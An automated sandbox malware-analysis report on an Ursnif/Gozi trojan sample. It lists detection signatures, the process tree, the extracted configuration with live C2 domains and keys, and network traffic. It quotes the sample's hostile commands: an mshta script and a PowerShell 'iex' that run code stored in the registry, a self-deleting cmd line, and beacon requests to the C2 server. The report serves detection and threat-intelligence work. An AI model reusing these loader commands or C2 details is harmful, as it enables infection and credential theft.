Loading ...

Play interactive tourEdit tour

Windows Analysis Report anIV2qJeLD.exe

Overview

General Information

Sample Name:anIV2qJeLD.exe
Analysis ID:527473
MD5:20c0d2005c6a542fb9c20466775c6142
SHA1:aff311698bd06a0010c9be81dae43d9c37dd847d
SHA256:4c50ff0945136ff0f79eb75ee7d5c86025282ab519488f692ffc267873160bb6
Tags:exeGoziISFB
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • anIV2qJeLD.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\anIV2qJeLD.exe" MD5: 20C0D2005C6A542FB9C20466775C6142)
    • control.exe (PID: 4936 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 4972 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 960 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4820 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD669.tmp" "c:\Users\user\AppData\Local\Temp\pqwen5zh\CSC508E00641FC7448693989664B7E60.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2368 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF386.tmp" "c:\Users\user\AppData\Local\Temp\i3mkzvx5\CSCB52324015C2F4AC8AC468C73504A2519.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6752 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\anIV2qJeLD.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 2280 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 5844 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6836 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1B15.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5700 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 6656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5708 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1B15.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1380 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000000.973836822.000001F4F1140000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000014.00000000.824591176.0000000000CA0000.00000040.00020000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000028.00000003.1067142468.00000000036C8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        0000000D.00000003.822024782.00000168B2DDC000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.753488992.00000000047BA000.00000004.00000040.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 82 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.3.anIV2qJeLD.exe.42994a0.11.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              1.3.anIV2qJeLD.exe.42994a0.11.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                1.3.anIV2qJeLD.exe.47ba4a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  1.3.anIV2qJeLD.exe.48394a0.3.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    1.3.anIV2qJeLD.exe.47ba4a0.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5180, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.cmdline, ProcessId: 2088
                      Sigma detected: Suspicious Rundll32 ActivityShow sources
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4936, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 4972
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132821702933009973.5180.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Yy03='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Yy03).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 960, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5180

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000001.00000002.962162001.0000000002030000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
                      Machine Learning detection for sampleShow sources
                      Source: anIV2qJeLD.exeJoe Sandbox ML: detected
                      Source: 1.2.anIV2qJeLD.exe.2030e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.3.anIV2qJeLD.exe.3bf0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.anIV2qJeLD.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeUnpacked PE file: 1.2.anIV2qJeLD.exe.400000.0.unpack
                      Source: anIV2qJeLD.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49780 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.4:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.4:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.4:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.4:49858 version: TLS 1.2
                      Source: Binary string: 5.pdbw=j source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
                      Source: Binary string: C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdb source: anIV2qJeLD.exe
                      Source: Binary string: ntdll.pdb source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdbXP source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: anIV2qJeLD.exe, 00000001.00000003.821704923.0000000005CC0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdb source: powershell.exe, 0000000D.00000002.908777927.000001689D0FB000.00000004.00000001.sdmp
                      Source: Binary string: 5.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\pqwen5zh\pqwen5zh.pdb source: powershell.exe, 0000000D.00000002.908707605.000001689D0BA000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i3mkzvx5\i3mkzvx5.pdbXP source: powershell.exe, 0000000D.00000002.908832791.000001689D133000.00000004.00000001.sdmp
                      Source: Binary string: h.pdb source: powershell.exe, 0000000D.00000003.874385564.00000168B230A000.00000004.00000001.sdmp
                      Source: Binary string: ]C:\rukemimac\nizejezoyoja-seyikanasocin69\hezosiwem\100\paseve.pdbP+C source: anIV2qJeLD.exe
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_01FDCBE3 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_01FDCBE3
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_01FDE9AC lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_01FDE9AC
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_01FE999E lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_01FE999E
                      Source: C:\Users\user\Desktop\anIV2qJeLD.exeCode function: 1_2_01FEA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_01FEA2FE
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 40_2_00FEE9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,40_2_00FEE9AC
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 40_2_00FF999E FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,40_2_00FF999E
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 40_2_00FFA2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,40_2_00FFA2FE

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: lycos.com
                      Source: C:\Windows\explorer.exeDomain query: mail.yahoo.com
                      Source: C:\Windows\explorer.exeDomain query: login.yahoo.com
                      Source: C:\Windows\explorer.exeDomain query: www.lycos.com
                      Uses nslookup.exe to query domainsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machineShow sources
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exeDNS query: name: myip.opendns.com
                      Uses ping.exe to check the status of other devices and networksShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/nIBVSTLyPt3UY/F_2Fx2Hc/Bze1TT57OG4HBNl2UO4H2_2/F2x5eVeu_2/F0oEIMCthzpdl_2F0/g6yK5x4lAPBL/IfJhlJxCH88/kNEvL4B2xwbPkg/l6LFIMkoo7_2BSx2Zl9QD/sNqAlyxot9VgUnIt/tD2_2FQ67j1kKZ4/4sQxxRyc1y_2Bi_2BR/gsw9z5z81/v3w096aztXCXUnfe5Q/wc2.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=0m9msshgpqh4o&b=3&s=91
                      Source: global trafficHTTP traffic detected: GET /jdraw/izNkSVzKAcmqBRr6xyW/6eSNtrmUMl5kl7H7bHpPPe/XgZq30OCLmJbN/38meyqW9/jS3Kn1JZp4TlGq5YgXpUl9C/Xa1SOjVmRG/sfAXrifyx5RMMj1rG/x2_2B6xVjnCu/FR4yio2EmeZ/DM6_2BUk4qTqT1/rz8mXurCnwQiTqH0u8uPF/_2Bjp7nf0rXmnB1i/Em2dqw_2Bys5D/8.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
